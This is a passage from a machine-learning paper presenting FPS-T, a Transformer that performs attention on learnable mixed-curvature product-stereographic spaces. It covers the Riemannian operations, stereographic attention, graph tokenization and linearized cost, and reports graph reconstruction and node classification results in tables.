geodesic from \( x \) to \( y \) using parallel transport \( \text{PT}_{x \rightarrow y} : T_xM \rightarrow T_yM \). Note that the product of Riemannian manifolds is also a Riemannian manifold. A point on the product Riemannian manifold \( x \in \otimes_{i=1}^{n} M_i \) consists of points from each component manifold \( M_i \), i.e., \( x = \|_{i=1}^{n} x_i \), where \( x_i \in M_i \) and \( \| \) denotes concatenation. The distance between \( x, y \in \otimes_{i=1}^{n} M_i \) is calculated as \( \sqrt{\sum_{i=1}^{n} d_{M_i}(x_i, y_i)^2} \). Exponential/logarithmic maps and parallel transports are applied in a manifold-wise fashion (e.g., \( \exp_x(v) = \|_{i=1}^{n} \exp_{x_i}(v_i) \) with \( v = \|_{i=1}^{n} v_i \) and \( v_i \in T_{x_i} M_i \)).

**Constant-curvature spaces.** Curvature is an important geometrical property used to characterize Riemannian manifolds.
One widely-used curvature for explaining Riemannian manifolds is the sectional curvature: given two linearly independent tangent vector fields \( U, V \in \mathfrak{X}(M) \), the sectional curvature \( K(U, V) \) is computed as \( K(U, V) = \frac{\langle R(U,V)V,U \rangle}{\langle U,U \rangle \langle V,V \rangle - \langle U,V \rangle^2} \), where \( R : \mathfrak{X}(M) \times \mathfrak{X}(M) \times \mathfrak{X}(M) \to \mathfrak{X}(M) \) is the Riemannian curvature tensor. The sectional curvature measures the divergence between geodesics starting with the tangent vector fields \( U, V \) at each point of the manifold. With positive or negative sectional curvatures, geodesics become closer or farther than with zero curvature. Throughout this paper, we refer to a space of constant sectional curvature as a **constant-curvature space**. For example, the Euclidean space \( \mathbb{E} \) is the special case of a constant-curvature space with zero curvature. When the curvature is positive or negative, we call the corresponding spaces spherical \( \mathbb{S} \) or hyperbolic \( \mathbb{H} \), respectively.

**Stereographic models.** A \( d \)-dimensional stereographic model \( \mathfrak{st}_\kappa^d \) is a constant-curvature space with curvature \( \kappa \in \mathbb{R} \). One attractive property of the stereographic model is that operations such as distance, exp/log maps, and parallel transport are differentiable at any curvature value \( \kappa \), including \( \kappa = 0 \). This enables the stereographic model to learn the curvature value \( \kappa \) without any constraint. The manifold of the stereographic model \( \mathfrak{st}_\kappa^d \) is \( \{ x \in \mathbb{R}^d \mid -\kappa \|x\|^2 < 1 \} \). The metric tensor is defined as \( g^\kappa(x) = \frac{4}{(1 + \kappa \|x\|^2)^2} I = (\lambda_x^\kappa)^2 I \), where \( \lambda_x^\kappa \) is known as the conformal factor. The Möbius addition between two points \( x, y \in \mathfrak{st}_\kappa^d \) is computed as \( x \oplus_\kappa y = \frac{(1-2\kappa x^T y-\kappa \|y\|^2)x+(1+\kappa \|x\|^2)y}{1-2\kappa x^T y+\kappa^2 \|x\|^2 \|y\|^2} \). Based on Möbius addition, we can derive other geometric operations, as shown in Table 3 in Appendix A. The table also shows that as \( \kappa \) converges to zero, the operations become equivalent to Euclidean space operations, so the stereographic model essentially recovers Euclidean geometry.

### 3.2 Multi-Head Attention

In the vanilla Transformer (Vaswani et al., 2017), each block consists of multiple attention heads, each taking a sequence of token embeddings \( X \in \mathbb{R}^{n \times d} \) with sequence length \( n \) and feature dimension \( d \) as input. Three linear layers \( W^Q, W^K, W^V \in \mathbb{R}^{d \times d'} \) first map each token embedding into queries \( Q \), keys \( K \), and values \( V \) with head dimension \( d' \), respectively. Then, the attention score matrix is computed by a scaled Euclidean dot-product between \( Q \) and \( K \), followed by a row-wise softmax activation \( \sigma(\cdot) \). The attention score matrix is then multiplied with the values \( V \), returning contextualized token embeddings. The overall procedure can be written as

\[ Q = XW^Q, \quad K = XW^K, \quad V = XW^V, \quad \text{Attn}(X) = \sigma \left( \frac{QK^T}{\sqrt{d'}} \right) V. \tag{1} \]

The outputs from the multiple attention heads are concatenated together, then processed through a feed-forward layer before proceeding to the next Transformer block.
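As a concrete illustration, here is a small NumPy sketch of the key stereographic operation above: `mobius_add` transcribes the Möbius addition formula verbatim, and the assertion checks that the $\kappa \to 0$ limit recovers plain vector addition, matching the stated recovery of Euclidean geometry. The inputs are toy values.

```python
# Minimal NumPy transcription of the Möbius addition formula above; the
# assertion checks that the kappa -> 0 limit recovers plain vector addition.
import numpy as np

def mobius_add(x, y, kappa):
    xy = float(np.dot(x, y))
    x2, y2 = float(np.dot(x, x)), float(np.dot(y, y))
    num = (1 - 2 * kappa * xy - kappa * y2) * x + (1 + kappa * x2) * y
    den = 1 - 2 * kappa * xy + kappa**2 * x2 * y2
    return num / den

x = np.array([0.1, 0.2])
y = np.array([-0.3, 0.05])
print(mobius_add(x, y, -1.0))    # hyperbolic (Poincare-ball-style) addition
print(mobius_add(x, y, +1.0))    # spherical (stereographic) addition
assert np.allclose(mobius_add(x, y, 0.0), x + y)   # Euclidean limit
```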
### 4 Fully Product-Stereographic Transformer

Here, we describe the inner workings of our proposed method. We generalize each operation in the Transformer to the product-stereographic model, together forming a geometric Transformer architecture that operates entirely within the stereographic model.

#### 4.1 Stereographic Neural Networks

We first introduce the stereographic analogues of Euclidean neural network components such as the linear layer, activation, layer normalization, and logit functions. We denote the product-stereographic model \( \otimes_{i=1}^{H} \mathfrak{st}_{\kappa_i}^{d_i} \) as \( \mathfrak{st}_{\otimes\kappa}^{d} \), where \( \kappa = (\kappa_1, \ldots, \kappa_H) \) is the ordered set of curvatures of the \( d_i \)-dimensional component spaces within a Transformer block with \( H \) attention heads. We also use the superscript \( \otimes \kappa \) to denote Riemannian operations on the product-stereographic model that decompose representations into equal parts, apply the operation, then concatenate back to the product space (e.g., if \( v = [v_1, \ldots, v_H] \), then \( \exp_0^{\otimes \kappa}(v) := \|_{i=1}^{H} \exp_0^{\kappa_i}(v_i) \)).

Figure 2: Illustration of our attention mechanism on the non-Euclidean space. FPS-T considers each value-vector as a point that resides on the stereographic model, and query/key-vectors as tangent vectors on the corresponding tangent spaces. All query/key-vectors are parallel-transported to the origin prior to dot-product attention, thereby taking the given geometry into account.

**Stereographic linear layer, activation, and layer normalization.** Given a Euclidean neural network \( f \), we can define its stereographic counterpart as \( \exp_0^{\otimes\kappa} (f(\log_0^{\otimes\kappa}(X))) \). The stereographic linear layer \( \text{Linear}_{\kappa}(X; W) \) is thus defined by setting \( f \) as the Euclidean linear layer \( f(X; W) = XW \). The same approach can be used for any Euclidean activation function \( f_{\text{act}} \) (e.g., ReLU, Tanh, ELU, and Sigmoid), from which we obtain stereographic activation functions. Stereographic layer normalization \( \text{LN}_{\kappa} \) is defined in the same manner.

**Stereographic logits.** Suppose that \( x \in \mathfrak{st}_\kappa^d \) is a stereographic embedding retrieved from the last Transformer layer. For prediction tasks such as node classification, we need to compute the probability that the node with embedding \( x \) belongs to class \( c \). Inspired by logistic regression in Euclidean spaces, Bachmann et al. (2020) propose its stereographic variant as

\[ p(y = c \mid x) \propto \exp \left( \text{sign}(\langle -p_c \oplus_\kappa x, a_c \rangle)\, \|a_c\|_{p_c}\, d_\kappa(x, H_{a_c, p_c}) \right), \tag{2} \]

where \( H_{a_c, p_c} = \{ x \in \mathfrak{st}_\kappa^d \mid \langle -p_c \oplus_\kappa x, a_c \rangle = 0 \} \) is a hyperplane formed by \( a_c \in T_{p_c} \mathfrak{st}_\kappa^d \) and \( p_c \in \mathfrak{st}_\kappa^d \). For the stereographic model \( \mathfrak{st}_\kappa^d \), the distance between \( x \in \mathfrak{st}_\kappa^d \) and the hyperplane \( H_{a, p} \) equals

\[ d_\kappa(x, H_{a, p}) = \sin^{-1}_\kappa \left( \frac{2\,|\langle -p \oplus_\kappa x, a \rangle|}{(1 + \kappa \|{-p} \oplus_\kappa x\|^2)\,\|a\|} \right). \tag{3} \]

This distance function can be easily extended to the product-stereographic model as mentioned in Section 3.1, and the parameters \( a, p \) that define the hyperplane are learnable during training.
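The lift-transform-project pattern of Section 4.1 can be sketched as follows. The helper names and the $\tan_\kappa$ / $\tan_\kappa^{-1}$ closed forms are assumptions consistent with the standard stereographic model of Section 3.1, not the authors' code.

```python
# Hedged sketch of the lift-transform-project pattern of Section 4.1:
# log-map points to the origin's tangent space, apply a Euclidean map f,
# and exp-map the result back onto the model.
import numpy as np

def _tan_k(t, k):
    if k > 0:  return np.tan(np.sqrt(k) * t) / np.sqrt(k)
    if k < 0:  return np.tanh(np.sqrt(-k) * t) / np.sqrt(-k)
    return t

def _arctan_k(t, k):
    if k > 0:  return np.arctan(np.sqrt(k) * t) / np.sqrt(k)
    if k < 0:  return np.arctanh(np.sqrt(-k) * t) / np.sqrt(-k)
    return t

def exp0(v, k):
    n = np.linalg.norm(v, axis=-1, keepdims=True) + 1e-15
    return _tan_k(n, k) * v / n

def log0(x, k):
    n = np.linalg.norm(x, axis=-1, keepdims=True) + 1e-15
    return _arctan_k(n, k) * x / n

def stereographic_linear(X, W, k):
    # exp0(f(log0(X))) with the Euclidean linear map f(X; W) = XW
    return exp0(log0(X, k) @ W, k)

X = exp0(0.1 * np.random.randn(5, 4), k=-1.0)   # 5 points on the k=-1 model
Y = stereographic_linear(X, 0.1 * np.random.randn(4, 4), k=-1.0)
```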
### 4.2 STEREOGRAPHIC MULTI-HEAD ATTENTION

Using the stereographic operations above, we propose a multi-head attention mechanism on product-stereographic models. The key intuition is that the \( h \)-th attention head operates on the \( \kappa_h \)-stereographic space. Given a sequence of \( n \) product-stereographic embeddings \( X \in \mathfrak{st}_{\otimes\kappa}^{n \times d} \), the attention head with curvature \( \kappa \) first obtains values using the stereographic linear layer. For queries and keys, it maps each stereographic embedding to the tangent space of the values as:

\[ Q = XW_Q \in T_V\,\mathfrak{st}_\kappa^{n \times d'}, \quad K = XW_K \in T_V\,\mathfrak{st}_\kappa^{n \times d'}, \quad V = \text{Linear}_\kappa(X; W_V) \in \mathfrak{st}_\kappa^{n \times d'}, \tag{4} \]

where \( W_Q, W_K \in \mathbb{R}^{d \times d'} \) are the query/key weight matrices, and \( W_V \in \mathbb{R}^{d \times d'} \) is the weight matrix for values. Then, the attention score between the \( i \)-th query \( Q_i \) and the \( j \)-th key \( K_j \) is computed by parallel-transporting the vectors to the origin and taking the inner product at the origin as

\[ \alpha_{ij} = \langle \text{PT}_{V_i \to 0}(Q_i), \text{PT}_{V_j \to 0}(K_j) \rangle_0. \tag{5} \]

Figure 2 illustrates our geometric attention mechanism. Because the metric tensor at the origin of the stereographic model is simply \( 4I \) with identity matrix \( I \), the Riemannian inner product becomes equivalent to the Euclidean inner product at the origin. Finally, we aggregate values based on the attention scores using the Einstein midpoint:

\[ \text{Aggregate}_\kappa(V, \alpha)_i := \frac{1}{2} \otimes_\kappa \left( \sum_{j=1}^n \frac{\alpha_{ij} \lambda_{V_j}^\kappa}{\sum_{k=1}^n \alpha_{ik} (\lambda_{V_k}^\kappa - 1)} V_j \right), \tag{6} \]

with conformal factor \( \lambda_{V_i}^\kappa \) at point \( V_i \in \mathfrak{st}_\kappa^{d'} \). By concatenating the aggregated results from each attention head, the final outcome of product-stereographic multi-head attention is

\[ \text{MHA}_{\otimes \kappa}(X) = \big\Vert_{h=1}^{H} \text{Aggregate}_{\kappa_h}(V^h, \alpha^h) \in \otimes_{h=1}^{H} \mathfrak{st}_{\kappa_h}^{n \times d'}, \tag{7} \]

where \( \kappa_h \) denotes the curvature of the \( h \)-th attention head.

### 4.3 WRAP-UP

For completeness, we fill in the gap on how intermediate steps such as skip-connections are generalized towards non-zero curvatures, and how representations are processed between Transformer layers with distinct curvatures. First, recall that the vanilla Transformer utilizes residual connections and layer normalization to mitigate vanishing gradients and induce better convergence (Vaswani et al., 2017). To apply these operations to representations in the product-stereographic space, we switch to

\[ X_l = \text{MHA}_{\otimes\kappa}(\text{LN}_{\otimes\kappa}(X_{l}^{\text{in}})) \oplus_{\otimes\kappa} X_{l}^{\text{in}}, \quad X_{l}^{\text{out}} = \text{FFN}_{\otimes\kappa}(\text{LN}_{\otimes\kappa}(X_{l})) \oplus_{\otimes\kappa} X_{l}. \tag{8} \]

Note that while each attention head in stereographic multi-head attention operates on its stereographic model independently, the product-stereographic feed-forward network FFN$_{\otimes\kappa}$, for which we use two stereographic linear layers with an activation in between, fuses representations from distinct geometries and performs interactions between different stereographic models similarly to previous work (Zhu et al., 2020b; Deng et al., 2023).
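A toy NumPy sketch of the aggregation in Equations (5)-(6) is given below. Parallel transport is abstracted away (`q_hat` and `k_hat` are assumed to already be the transported tangent vectors at the origin), a row-wise softmax is applied to the scores for numerical sanity as in Equation (1), and `scale_k` sketches the gyro-scalar multiplication $\frac{1}{2} \otimes_\kappa$ via exp/log maps at the origin; all names are hypothetical.

```python
# Toy sketch of Eqs. (5)-(6): scores in the origin's tangent space, then
# Einstein-midpoint aggregation of the value points.
import numpy as np

def _tan_k(t, k):
    if k > 0:  return np.tan(np.sqrt(k) * t) / np.sqrt(k)
    if k < 0:  return np.tanh(np.sqrt(-k) * t) / np.sqrt(-k)
    return t

def _arctan_k(t, k):
    if k > 0:  return np.arctan(np.sqrt(k) * t) / np.sqrt(k)
    if k < 0:  return np.arctanh(np.sqrt(-k) * t) / np.sqrt(-k)
    return t

def scale_k(r, x, k):
    # gyro-scalar multiplication r (x)_k x = exp0(r * log0(x))
    n = np.linalg.norm(x, axis=-1, keepdims=True) + 1e-15
    return _tan_k(r * _arctan_k(n, k), k) * x / n

def conformal_factor(x, k):
    return 2.0 / (1.0 + k * np.sum(x * x, axis=-1))

def aggregate(q_hat, k_hat, V, k):
    scores = q_hat @ k_hat.T                       # inner products at the origin (Eq. 5)
    alpha = np.exp(scores - scores.max(-1, keepdims=True))
    alpha /= alpha.sum(-1, keepdims=True)          # row-wise softmax, as in Eq. (1)
    lam = conformal_factor(V, k)                   # conformal factors of the values
    denom = (alpha * (lam - 1.0)[None, :]).sum(-1, keepdims=True)
    mid = ((alpha * lam[None, :]) / denom) @ V     # Einstein-midpoint combination (Eq. 6)
    return scale_k(0.5, mid, k)

n, d = 6, 4
q_hat, k_hat = np.random.randn(n, d), np.random.randn(n, d)
V = 0.1 * np.random.randn(n, d)                    # points inside the k=-1 ball
print(aggregate(q_hat, k_hat, V, -1.0).shape)      # (6, 4)
```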
Furthermore, note that each $l$-th Transformer layer operates on a distinct product-stereographic space $\mathfrak{st}_{\otimes \kappa^l}^{d}$, where $\kappa^l = (\kappa_1^l, \ldots, \kappa_H^l)$ together forms the geometric signature of the layer. For consistency, we assume that the input embeddings lie on the product-stereographic model of the first layer (i.e., $\mathfrak{st}_{\otimes \kappa^1}^{d}$). In the case of classification tasks where logits are computed, the product-stereographic logit layer operates on the last set of curvatures (i.e., $\mathfrak{st}_{\otimes \kappa^L}^{d}$, where $L$ denotes the number of Transformer layers). In between layers, representations are translated from $\mathfrak{st}_{\otimes \kappa^l}^{d}$ to $\mathfrak{st}_{\otimes \kappa^{l+1}}^{d}$ by assuming a shared tangent space at the origin (i.e., $X_{l+1}^{\text{in}} = (\exp_{0}^{\otimes \kappa^{l+1}} \circ \log_{0}^{\otimes \kappa^l})(X_{l}^{\text{out}})$). Altogether, it is straightforward to see that FPS-T becomes equivalent to the original Transformer as all curvatures $\kappa$ approach 0, yet it retains the capability to deviate from Euclidean geometry when doing so leads to better optimization. For all experiments, we initialize all curvatures at zero to demonstrate the practicality of our method, as it does not require additional hyperparameter tuning over different curvature combinations.

### 4.4 EXTENSION TO GRAPH TRANSFORMER

To learn from graph-structured data with FPS-T, we borrow the tokenization technique used by TOKENGT (Kim et al., 2022). Let $G = (V, E)$ be a graph with $N$ nodes in node-set $V$, $M$ edges in edge-set $E$, and respective features $X_V \in \mathbb{R}^{N \times d}$, $X_E \in \mathbb{R}^{M \times d}$. Then, we tokenize $G$ into a sequence $X = [X_V, X_E] \in \mathbb{R}^{(N+M) \times d}$ by treating each node and edge as an independent token, and augment the tokens with 1) node identifiers that serve as positional encodings and 2) type identifiers that allow the model to distinguish between node- and edge-tokens (a toy sketch of this construction appears below). TOKENGT feeds this sequence into a vanilla Transformer, an approach proven to pass the 2-dimensional Weisfeiler-Lehman (2-WL) graph isomorphism test and surpass the theoretical expressivity of message-passing GNNs (Kim et al., 2022; Maron et al., 2019). More details on the tokenization procedure can be found in Appendix B. In our work, we instead encode the input sequence through FPS-T, such that nodes and edges exchange information globally on the product-stereographic space. As the augmented feature vectors $X$ are initially Euclidean, we assume each token lies within the tangent space at the origin of the product-stereographic model of the first layer, $T_0\,\mathfrak{st}_{\otimes \kappa^1}^{d} \cong \mathbb{R}^{H\hat{d}}$, where $|\kappa^1| = H$, $\hat{d}$ is the dimension of each component space, and $H\hat{d} = d$. Therefore, we apply the exponential map to the tokens to place them on the product-stereographic model via $\exp_{0}^{\otimes \kappa^1}(X)$, the output of which is forwarded through FPS-T.

### 4.5 COST LINEARIZATION OF STEREOGRAPHIC ATTENTION

One drawback of the graph tokenization method above is that its computational cost becomes intractable when encoding large graphs. As computing the attention score matrix takes time and memory quadratic in the sequence length, a graph with $N$ nodes and $M$ edges incurs an asymptotic cost of $O((N + M)^2)$, which can be $O(N^4)$ for dense graphs.
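The following toy sketch illustrates the TokenGT-style tokenization referenced in Section 4.4 and makes the sequence length $N + M$ behind this quadratic cost explicit. Random orthonormal node identifiers are one common choice; the exact identifier and type-embedding construction of Kim et al. (2022) is not reproduced verbatim here.

```python
# Toy sketch of the node/edge tokenization of Section 4.4 (TokenGT-style):
# node token = [feature, P_u, P_u, node-type]; edge token = [feature, P_u, P_v, edge-type].
import numpy as np

def tokenize_graph(X_v, X_e, edges, id_dim=8):
    N, M = X_v.shape[0], X_e.shape[0]
    assert id_dim >= N, "need at least N orthonormal identifiers"
    Q, _ = np.linalg.qr(np.random.randn(id_dim, id_dim))
    P = Q[:, :N].T                                  # N orthonormal node identifiers
    t_node, t_edge = np.array([1.0, 0.0]), np.array([0.0, 1.0])
    node_tokens = [np.concatenate([X_v[u], P[u], P[u], t_node]) for u in range(N)]
    edge_tokens = [np.concatenate([X_e[i], P[u], P[v], t_edge])
                   for i, (u, v) in enumerate(edges)]
    return np.stack(node_tokens + edge_tokens)      # sequence of length N + M

X_v, X_e = np.random.randn(4, 3), np.random.randn(3, 3)
tokens = tokenize_graph(X_v, X_e, [(0, 1), (1, 2), (2, 3)])
print(tokens.shape)                                 # (7, 3 + 2*8 + 2) = (7, 21)
```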
Fortunately, there exist various advancements for making Transformers more efficient (Tay et al., 2022; Kitaev et al., 2020; Choromanski et al., 2020; Wang et al., 2020; Xiong et al., 2021; Cho et al., 2022). In linearized attention (Katharopoulos et al., 2020), it is shown that the Euclidean attention score $\langle Q_i, K_j \rangle$ can be approximated with the product of kernel functions $\phi(Q_i)\phi(K_j)^T$, where $\phi(X) = \text{ELU}(X) + 1$. For stereographic attention (Equation 5), computing dot-products on the tangent space of the origin allows us to extend this kernelization to FPS-T. Let $\tilde{Q}_i = \text{PT}_{V_i \rightarrow 0}(Q_i)$ and $\tilde{K}_j = \text{PT}_{V_j \rightarrow 0}(K_j)$ be the tangent vectors at the origin prior to taking the dot-product. By applying kernelization to stereographic attention, we can rewrite the stereographic aggregation (Equation 6) as

$$ \frac{1}{2} \otimes_{\kappa} \left( \sum_{j=1}^{n} \frac{\langle \tilde{Q}_i, \tilde{K}_j \rangle_0 \lambda_{V_j}^{\kappa}}{\sum_{k=1}^{n} \langle \tilde{Q}_i, \tilde{K}_k \rangle_0 (\lambda_{V_k}^{\kappa} - 1)} V_j \right) \approx \frac{1}{2} \otimes_{\kappa} \left[ \phi(\tilde{Q}) \left( \phi'(\tilde{K})^T \tilde{V} \right) \right]_i $$

where $\phi'(\tilde{K})_i = \phi(\tilde{K})_i (\lambda_{V_i}^{\kappa} - 1)$ and $\tilde{V}_i = \frac{\lambda_{V_i}^{\kappa}}{\lambda_{V_i}^{\kappa} - 1} V_i$. This approximation enables FPS-T to encode graphs with $O(N + M)$ cost, matching the complexity of message-passing GCNs (Wu et al., 2020) while taking the non-Euclidean geometry into account. In Appendix C, we empirically verify this asymptotic cost and also find that the additional cost of the Riemannian operations in FPS-T is mostly dominated by pre-existing Transformer operations when encoding large networks. In the upcoming experiments, we use the kernelized approach for FPS-T and find that the approximation performs well in practice.

| Model | Space | TREE | SPHERE | TORUS | RING OF TREES |
|----------------|-------------|----------|----------|----------|---------------|
| TOKENGT | $\mathbb{E}^{10}$ | 0.04363 | 0.04023 | 0.07172 | 0.05553 |
| | $\mathbb{S}^5 \times \mathbb{E}^5$ | 0.04357 | 0.04139 | 0.07167 | 0.05546 |
| FPS-T (ours) | $\mathfrak{st}_{\kappa_1}^{10}$ | **0.00072** | **0.02176** | **0.06415** | **0.03393** |
| | $\mathfrak{st}_{\kappa_1}^5 \times \mathfrak{st}_{\kappa_2}^5$ | 0.00105 | 0.02206 | **0.06135** | **0.01630** |
| Best FPS-T curvatures | | (-1.219) | (+0.0629) | (+1.308, +0.2153) | (+0.3241, -3.314) |

Table 1: Synthetic graph reconstruction results in average distortion (lower is better). The best FPS-T configuration and its learned curvatures are well-aligned with the geometry of the input graph.

Figure 3: Illustration of geometric graphs used in our synthetic graph reconstruction experiment: (a) TREE, (b) SPHERE, (c) TORUS, (d) RING OF TREES.

5 EXPERIMENTS

We first evaluate FPS-T on synthetic geometric graph reconstruction (e.g., tree or spherical graphs) to verify whether our approach learns curvatures that best fit the input graph. We also benchmark existing graph reconstruction and node classification datasets to empirically demonstrate the benefit of capturing long-range interactions under mixed-curvature spaces in real-world settings.

5.1 GRAPH RECONSTRUCTION

**Datasets.**
For synthetic graph reconstruction, we generate four types of graphs where the suitable geometry is known a priori: TREE ($\mathbb{H}$), SPHERE ($\mathbb{S}$), TORUS ($\mathbb{S} \times \mathbb{S}$), and RING OF TREES ($\mathbb{S} \times \mathbb{H}$). An example illustration of the synthetic graphs can be found in Figure 3. We then evaluate FPS-T on four real-world networks: WEB-EDU (Gleich et al., 2004) is a web-page network under the .edu domain connected with hyperlinks; POWER (Watts & Strogatz, 1998) is a network that models the electrical power grid in the western US; BIO-WORM (Cho et al., 2014) is a genetics network of the C. elegans worm; FACEBOOK (Leskovec & Mcauley, 2012) is a social network. Further details on the datasets, such as sectional curvature statistics of the networks, can be found in Appendix D.

**Training.** The goal of graph reconstruction is to learn continuous node representations of the given graph that preserve the edge connectivity structure through distances in the feature space. Let $h_u$ denote the encoded representation of node $u \in V$ given a graph $G = (V, E)$. For synthetic graph reconstruction, we train FPS-T and TOKENGT by minimizing the graph distortion (Gu et al., 2019):

$$ L(h, G) = \sum_{(u,v) \in V \times V,\, u \neq v} \left| \left( \frac{d(h_u, h_v)}{d_G(u, v)} \right)^2 - 1 \right| $$

where $d(h_u, h_v)$ denotes the distance between $h_u$ and $h_v$ in the representation space, and $d_G(u, v)$ equals the shortest path distance between nodes $u$ and $v$ on graph $G$. Both methods use a single layer with 1 or 2 attention heads and a combined latent dimension of 10.

| Dataset | WEB-EDU | POWER | FACEBOOK | BIO-WORM |
|---------|---------|-------|----------|----------|
| Avg. Curvature | -0.63 | -0.28 | -0.08 | -0.03 |
| MLP | 83.24±1.32 | 83.89±4.02 | 50.64±15.12 | 73.34±20.85 |
| GCN | 79.95±0.23 | 98.25±0.02 | 78.99±0.29 | 93.32±1.06 |
| GAT | 88.86±0.36 | 99.03±0.01 | 82.81±0.25 | 97.76±0.03 |
| SAGE | 86.34±0.31 | 97.58±0.14 | 81.01±0.26 | 96.86±0.06 |
| SGC | 78.78±0.12 | 97.69±0.05 | 74.69±0.36 | 89.73±0.59 |
| TOKENGT | 89.45±0.06 | 99.10±0.00 | 84.71±0.02 | 97.82±0.02 |
| HGCN | 80.13±0.31 | 96.82±0.08 | 74.35±5.39 | 86.96±0.30 |
| HGNN | 83.64±0.26 | 97.85±0.05 | 78.74±0.58 | 90.97±1.06 |
| HAT | 90.21±0.36 | 93.86±0.34 | 80.09±0.20 | 93.58±0.42 |
| \( \kappa \)-GCN | 55.34±35.88 | 98.23±0.09 | 20.80±20.69 | 84.16±13.67 |
| \( Q \)-GCN | 80.34±0.07 | 97.87±0.01 | 76.33±0.01 | 96.15±0.01 |
| FPS-T | 99.10±0.01 | 99.32±0.01 | 86.16±0.10 | 98.19±0.03 |

Figure 4: **Left:** Real-world graph reconstruction results. We run each method under 5 random seeds and report the average mAP with 95% confidence intervals. **Right:** Test mAP (Y-axis) of FPS-T and TOKENGT on WEB-EDU with decreasing model size (X-axis; by decreasing the latent dimension). Using mixed-curvature spaces can be more parameter efficient in preserving graph structures.

For real-world graph reconstruction, we instead minimize a loss function that aims to preserve the local connections, as computing the all-pairwise shortest path distances becomes computationally intractable for large networks:

\[ L(h, G) = -\sum_{(u,v) \in E} \log \frac{e^{-d(h_u,h_v)}}{\sum_{v' \in E(u)} e^{-d(h_u,h_{v'})}} \]

Here, \( E(u) \) denotes the set of non-neighbors of node \( u \).
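For illustration, here is a small sketch of the local-connectivity objective above, with Euclidean distances standing in for the model's geodesic distances; `non_neighbors` plays the role of $E(u)$, and all inputs are hypothetical toy values.

```python
# Toy sketch of the local reconstruction objective: pull neighbors close,
# push non-neighbors (the set E(u)) away. Distances here are Euclidean
# stand-ins for the model's geodesic distances.
import numpy as np

def local_reconstruction_loss(H, edges, non_neighbors):
    loss = 0.0
    for u, v in edges:
        pos = np.exp(-np.linalg.norm(H[u] - H[v]))
        neg = sum(np.exp(-np.linalg.norm(H[u] - H[w])) for w in non_neighbors[u])
        loss += -np.log(pos / neg)   # negative log-ratio, as in the formula above
    return loss

H = np.random.randn(4, 3)            # 4 node embeddings
edges = [(0, 1), (1, 2), (2, 3)]
non_neighbors = {0: [2, 3], 1: [3], 2: [0], 3: [0, 1]}
print(local_reconstruction_loss(H, edges, non_neighbors))
```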
In addition to TOKENGT, we also compare FPS-T against baselines including Euclidean (GCN (Kipf & Welling, 2016), GAT (Veličković et al., 2017), SAGE (Hamilton et al., 2017), SGC (Wu et al., 2019)), hyperbolic (HGCN (Chami et al., 2019), HGNN (Liu et al., 2019), HAT (Zhang et al., 2021)), and mixed-curvature (\( \kappa \)-GCN (Bachmann et al., 2020), \( Q \)-GCN (Xiong et al., 2022)) message passing-based GCNs. For fair comparison, we set the number of layers to one and the latent dimension to 16 for all models. We train all models for 10k epochs using an Adam optimizer with learning rate $10^{-2}$. The node features are given as one-hot encodings with additional random noise, following Xiong et al. (2022). We defer details on the choice of hyperparameters of baseline methods to Appendix E.

**Results.** Table 1 reports the synthetic graph reconstruction results in average graph distortion as well as the curvatures learned by FPS-T. As expected, FPS-T consistently outperforms its Euclidean counterpart on all four graphs, as they exhibit highly non-Euclidean structures. Despite being initialized at zero, the learnable curvatures in FPS-T converge towards values that intuitively match the input graph: for RING OF TREES, FPS-T with two attention heads converges towards one positive and one negative curvature, outperforming the single-head variant.

Next, the left table in Figure 4 shows the average sectional curvature of each real-world network and the corresponding graph reconstruction results in mean average-precision (mAP), which measures the average ratio of nearest points that are actual neighbors of each node. We find that FPS-T shows significant performance gains on all four networks when compared to all baselines, including the Euclidean TOKENGT. Specifically, FPS-T shows a 10.5% gain in mAP over TOKENGT on WEB-EDU, which has an average sectional curvature of -0.63, showing that performing attention on the non-Euclidean product-stereographic space is especially effective when encoding graphs containing many non-zero sectional curvatures.

Note that non-Euclidean spaces are theoretically known to well-embed complex structures in low dimensions, while Euclidean spaces require a large number of dimensions to attain reasonable precision (Sala et al., 2018). Based on this observation, we test whether FPS-T enjoys better parameter efficiency compared to TOKENGT by training both models with decreasing latent dimensions in \{16, 12, 8, 4\}. In the right plot of Figure 4, we report the mAP score of TOKENGT and FPS-T on the WEB-EDU network after training with a decreasing number of parameters. We observe that our approach of incorporating mixed-curvature spaces consistently obtains low-distortion embeddings in a more parameter-efficient manner, outperforming TOKENGT with \( d = 16 \) using half its model size.

Table 2: Node classification results. We run each method under 10 different random seeds and report the average F1 scores with 95% confidence intervals and average rankings across all datasets.

| Dataset | TEXAS | CORNELL | WISCONSIN | ACTOR | AIRPORT | CITESEER | PUBMED | CORA | Avg. Rank |
|---------|-------|---------|-----------|-------|---------|----------|--------|------|-----------|
| H(G) | 0.11 | 0.13 | 0.20 | 0.22 | 0.72 | 0.74 | 0.80 | 0.81 | |
| MLP | 70.54±3.00 | 58.38±4.04 | 81.20±1.87 | 33.62±0.55 | 54.05±1.78 | 52.58±1.97 | 67.17±0.91 | 52.44±1.08 | 8.25 |
| GCN | 57.84±1.62 | 47.84±1.77 | 45.40±2.62 | 27.09±0.36 | 92.00±0.63 | 71.38±0.43 | 78.37±0.26 | 80.40±0.53 | 7.38 |
| GAT | 59.46±1.12 | 55.14±1.80 | 46.20±2.30 | 27.43±0.23 | 92.35±0.36 | 71.70±0.29 | 78.14±0.31 | 82.29±0.46 | 6.13 |
| SAGE | 68.38±3.54 | 70.54±2.01 | 78.40±0.52 | 36.87±0.50 | 93.21±0.57 | 70.58±0.42 | 77.31±0.59 | 78.88±0.87 | 5.13 |
| SGC | 57.57±2.96 | 52.97±2.87 | 46.40±2.01 | 27.14±0.46 | 90.48±1.01 | 72.11±0.38 | 75.11±1.27 | 79.68±0.65 | 8.25 |
| TOKENGT | 88.65±2.06 | 71.62±2.13 | 83.00±0.65 | 36.59±0.89 | 95.90±0.39 | 71.23±0.51 | 78.93±0.27 | 81.42±0.79 | 2.50 |
| HGNN | 54.59±3.93 | 55.68±1.80 | 55.60±2.53 | 28.89±0.16 | 92.47±0.63 | 69.92±0.60 | 75.67±0.99 | 80.00±0.85 | 7.00 |
| HAT | 50.81±3.60 | 52.70±1.42 | 54.60±2.68 | 29.09±0.19 | 90.55±0.71 | 69.82±0.53 | 76.72±0.86 | 79.30±0.51 | 8.75 |
| κ-GCN | 82.16±2.52 | 70.54±1.67 | 81.80±1.36 | 38.34±0.26 | 92.88±0.57 | 68.14±0.53 | 77.50±0.42 | 79.81±0.58 | 4.38 |
